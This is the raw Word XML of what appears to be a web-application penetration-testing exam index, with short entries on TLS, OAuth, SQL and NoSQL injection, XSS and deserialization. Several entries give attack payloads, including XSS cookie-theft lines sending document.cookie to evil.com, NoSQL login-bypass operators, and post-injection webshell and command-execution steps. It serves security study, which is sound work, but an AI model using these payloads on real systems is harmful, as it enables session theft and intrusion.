            <w:tr w:rsidR="00985AE1" w14:paraId="4D6CC5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22E9BF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HTTPS – Public Keys, Certificates &amp; CAs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B1.145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12256E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Anyone can generate a public key. Certificates PROVE trustworthiness. CAs digitally sign certs. Browser has built-in CA trust store. Self-signed cert = 'This Connection is Untrusted' = typically a PROXY is intercepting. Chain: Root CA → Intermediate CA → Server Cert</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="57AB2D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0E709C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HTTPS – Transmission Security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B1.140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A700CE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HTTP = cleartext (sniffable). HTTPS wraps HTTP in TLS. Provides: Confidentiality (encrypt data), Authentication (certs prove server identity), Integrity (hashing prevents tampering). Exam: 3 properties of TLS = Confidentiality + Authentication + Integrity</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="27A6F1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5CF46A8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I</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7F34BD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4A7DCBD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Insecure Deserialization – Modifying Params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B5.37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701E82C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Find: cookies, hidden fields, POST params. Java: 'rO0AB'(Base64) or 'aced0005'(hex). PHP: O:8:'Class':... .NET: VIEWSTATE. Python: pickle. Decode→modify→re-encode→submit. Use ysoserial for Java gadget chains</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="02527F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25567EF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O</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="18EC26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1E8EE8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OAUTH2 – Grant Types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B2.89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0138BE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Auth Code (most secure, server-side). Implicit (deprecated). Resource Owner Password (direct user/pass). Client Credentials (service-to-service). PKCE = Auth Code + code_verifier for public clients</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="27F2E1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69FB51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P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2BC1F6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2BB9949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Pentest Post-Assessment (B5.114)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B5.114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9876F3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Results must match audience: Executives=business impact+financial. IT/Devs=technical details. Formats: Written Report (standard), Spreadsheet (in-house teams), XML/JSON (feed into vuln mgmt systems), Portals. Multiple debriefs may be needed for different audiences</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="02C217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4B24344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Python – Data Types &amp; if/elif/else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B5.60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6F6BD1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Types: int, str, float, bool, list, dict, bytes. if/elif/else. int(input()) for HTTP status codes. status_code &gt;= 200 and &lt;= 299 = success. Indentation is syntax (not style). No braces — use 4 spaces. Type conversion: int('200'), str(200)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="03257E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B10DB9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Python – Loops (for/while)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B5.61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0C43B5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for item in list: (no index). for i in range(10):. while condition:. break/continue. response.text.split(chr(10)) to iterate lines. List comprehension: [x for x in list if x]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6F4844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072E50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Python – Lists &amp; Dictionaries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B5.62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2C9B59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List: urls=['a','b']. urls.append(x). Dict: headers={'User-Agent':'Mozilla'}. Access: headers['key']. Pass to requests: requests.get(url, headers=headers, cookies={'session':'abc'})</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="28C6FD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426E9E9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S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7197BC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74EB2D3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lastRenderedPageBreak/>
                    <w:t>SQL Injection – Categories overview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B3.105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D31911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In-band/Inline: results returned in same channel (UNION, error). Out-of-Band: DNS/HTTP exfil. Blind: no data returned (Boolean, Time-based). Error-based: DB error reveals data. Categories apply to both SQL and NoSQL. sqlmap handles all automatically</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="76AC6E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51BEE2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 – Comment operators by DB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B3.56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B8D4C1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MySQL: # or --(space) or /**/ or %23. MSSQL/Oracle/PostgreSQL/SQLite: --. URL encode: %23=# %2D%2D=--. Inline: /*comment*/. Exam: MySQL unique with # option</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="002BFA8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00FCA4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SQL – Injection Locations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B3.70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08CECA1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SQL injection can exist in: GET params, POST body, HTTP headers (User-Agent, Referer, X-Forwarded-For, Cookie), JSON fields, XML fields, ORDER BY clause, GROUP BY clause, LIMIT clause, table/column names. Test ALL inputs including headers</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1B50BA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237A20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H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1590AD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317FF9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HTTP – Test HTTP Methods (script)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B1.135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4AB4CFB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Shell script: for each in GET POST PUT TRACE CONNECT OPTIONS DELETE; do printf '$each / HTTP/1.1 Host: target  ' | nc target 80; done. Alternatively: curl -X METHOD URL. Burp: right-click→Change request method. nmap --script http-methods target</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="36C035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6A6EC67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W</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="589E74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06C9605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Web Server Components – identification table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B1.133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681476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Web: Apache/IIS/Nginx. Frameworks: Spring/ASP.NET/Django/Rails. CMS: WordPress/Drupal/Joomla/SharePoint. DB: MySQL/MSSQL/Oracle/PostgreSQL. ID via: Wappalyzer, default pages, error messages, headers, Retire.js</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="24057D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51D99A6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X</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="630056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19DD2F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XSS – alert() / confirm() / prompt() alternatives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B4.32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1EB3639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Classic: alert(42). Alternative: confirm(42). Styled: prompt('Answer?','42'). Prove domain context: alert(document.domain). Prove cookie access: alert(document.cookie). External JS: new Image().src='//evil.com/?'+document.cookie. Use confirm()/prompt() when alert() is WAF-blocked</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0D3C47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1EF4C66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XSS – Injection points &amp; discovery tests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B4.75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2F6D3FF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Test ALL inputs: URL params, POST fields, HTTP headers, cookies, JSON. Send unique probe string first (not special chars). Then test: &lt;script&gt;alert(42)&lt;/script&gt;. Check ALL output locations (not just same page). DOM sources: location, referrer, URL. Tools: XSScrapy, DalFox, XSStrike, Burp active scan</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="14E53C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5C99096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XSS – Session Abuse / Cookie Theft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B4.34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760ABC4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Cookie theft: new Image().src='//evil.com/?c='+document.cookie (needs no HttpOnly). Forged requests: XHR with withCredentials=true. Defacement: document.body.innerHTML='hacked'. External JS: &lt;script src='//evil.com/hook.js'&gt;&lt;/script&gt;. BeEF for advanced attacks</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="24F3EF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944F19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D</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7A7F6B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D338D2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Database Injection Impact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B3.110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DBA98A8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After confirming injection: Fingerprint DBMS (version, DB type). Enumerate schema (databases→tables→columns). Exfiltrate data (UNION SELECT, blind). Read files: MySQL LOAD_FILE(), MSSQL OPENROWSET. Write files: SELECT INTO OUTFILE→webshell. Execute commands: MSSQL xp_cmdshell, MySQL UDF. Modify data (CAREFUL). sqlmap --level 3+ for advanced techniques</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7479F3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054CF5A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M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="29ED99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588B092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Manual vs Automated Testing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B1.18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67EA7DE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Automated: fast, deep fuzzing, consistent, finds false positives, misses logic flaws, may break app. Manual: slow, finds logic/business flaws, session-aware, understands context. BEST APPROACH: COMBINE BOTH. Tools augment manual testing — they don't replace it. Logic flaws require human understanding</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5BD960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1B13A62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D</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="16D72B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D5191FE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DAST – Web App Scanner tools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B1.38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7D5A937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Push-button DAST scanners: Burp Pro Active Scan, ZAP Active Scan, Arachni. Rapid fuzzing of all inputs. Fast but high false-positive rate. Must verify findings manually. Cannot replace manual testing for logic flaws. Good for: baseline coverage, quick wins, large surface areas</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="564F5D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57AE5713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S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1A2C69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3DB3892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Security Logging &amp; Monitoring Failures (A09:2021)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B5.30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2BA2A8A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OWASP A09. Breaches undetected avg 191 days. Log: auth failures, access control failures, admin changes. Logs: centralized, tamper-resistant, SIEM-monitored. Pen test: verify logging works, test incident response</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="10E609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4E6AF7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J</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2AF4FD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640FDF7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JavaScript Objects – window &amp; document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B4.9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FFCA93A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window = browser window object (global scope). document = DOM document loaded in window. Key properties: window.location (URL/redirect), window.history, document.cookie (read cookies, blocked by HttpOnly), document.domain (origin), document.forms (form fields + hidden values), document.referrer</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="68E3CE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13ACD7E9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N</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6BF879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0663A7D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NoSQL Injection – Blind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B3.104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82B30B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No data returned in response. Use: timing delays, DNS/HTTP OOB via Burp Collaborator. MongoDB: {$where: 'sleep(5000)'}. Boolean: {$where: 'this.password.match(/a.*/)'} returns differently for true/false. NoSQL blind = similar technique to SQL time/boolean blind</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="753777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3664A1F5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NoSQL Injection – Non-Blind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B3.101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4DA605C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Data returned in response. MongoDB operators: {$gt:''} for bypass. {$where: '1==1'} for always-true. Projection abuse. Aggregate injection. Response contains user data = successful injection. Use Burp Intruder or sqlmap with NoSQL plugins for enumeration</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6F9F88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6BE13746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NoSQL Injection – Payload examples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B3.67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3A126AFF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MongoDB auth bypass: {'user':{'$gt':''},'pass':{'$gt':''}}. URL params: user[$gt]=&amp;pass[$gt]=. JSON: {'user':{'$ne':'x'},'pass':{'$ne':'x'}}. $where: {'$where':'function(){return true}'}. $regex: {'user':{'$regex':'admin.*'}}. operator injection in ANY field</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="02538B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563675D7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C</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="65742D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FFFFF"/>
                </w:tcPr>
                <w:p w14:paraId="5A252C00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Capture the Flag (CTF) – Lab overview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B1.1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4800" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:tcPr>
                <w:p w14:paraId="5F15E161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CTF exercises span all books. Practical application of all techniques. Lab environments: gwaptserver, sec542.org, Security542 VM. CTF progression follows course sections. Key targets: drupal.sec542.org, gwaptserver/gwapt/*, suggestionbox.sec542.net. Flags are hidden strings to find and submit</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4F389C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400" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
                </w:tcPr>
                <w:p w14:paraId="35105924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L</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7C846E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shd w:val="clear" w:color="auto" w:fill="F0F4FB"/>
                </w:tcPr>
                <w:p w14:paraId="49D7214D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2"/>
                      <w:szCs w:val="12"/>
                    </w:rPr>
                    <w:t>Labs – Workbook reference (W1 &amp; W2)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C9A84C"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  W1.2</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4800" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="F0F4FB"/>
                </w:tcPr>
                <w:p w14:paraId="5D2556EB" w14:textId="77777777" w:rsidR="00985AE1" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:spacing w:before="2" w:after="2"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:color w:val="222222"/>
                      <w:sz w:val="11"/>
                      <w:szCs w:val="11"/>
                    </w:rPr>
                    <w:t>W1: Labs 1.1-3.6 (proxies, spidering, fuzzing, scanning, auth, sessions, injection, SQLi). W2: Labs 4.1-5.Bonus3 (XSS, BeEF, DOM-XSS, Prototype Pollution, SSTI, SSRF, CSRF, Deserialization, Python, Metasploit, Nuclei, Bonus). Follow lab workbook for steps</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7F88869E" w14:textId="77777777" w:rsidR="00985AE1" w:rsidRDefault="00985AE1"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CDFDBBF" w14:textId="77777777" w:rsidR="00C96D30" w:rsidRDefault="00C96D30"/>
    <w:sectPr w:rsidR="00C96D30">
      <w:pgSz w:w="15840" w:h="12240"/>
      <w:pgMar w:top="240" w:right="300" w:bottom="240" w:left="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44240"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5865C7A"/>
    <w:lvl w:ilvl="0" w:tplc="1CF08CC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="14CC4E3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D79E4988">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5D9A5B24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E3909E66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5EC8B148">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AC1AEF20">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5F8CD70E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BF8E5568">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="369040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AE1"/>
    <w:rsid w:val="009568ED"/>
    <w:rsid w:val="00985AE1"/>
    <w:rsid w:val="00C96D30"/>
    <w:rsid w:val="00DB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CC433"/>
  <w15:docId w15:val="{53FBEB13-3FB9-4D1A-AFCA-7BBFF2D1E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7908</Words>
  <Characters>45081</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>375</Lines>
  <Paragraphs>105</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>52884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nalluri</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-03T23:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T23:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>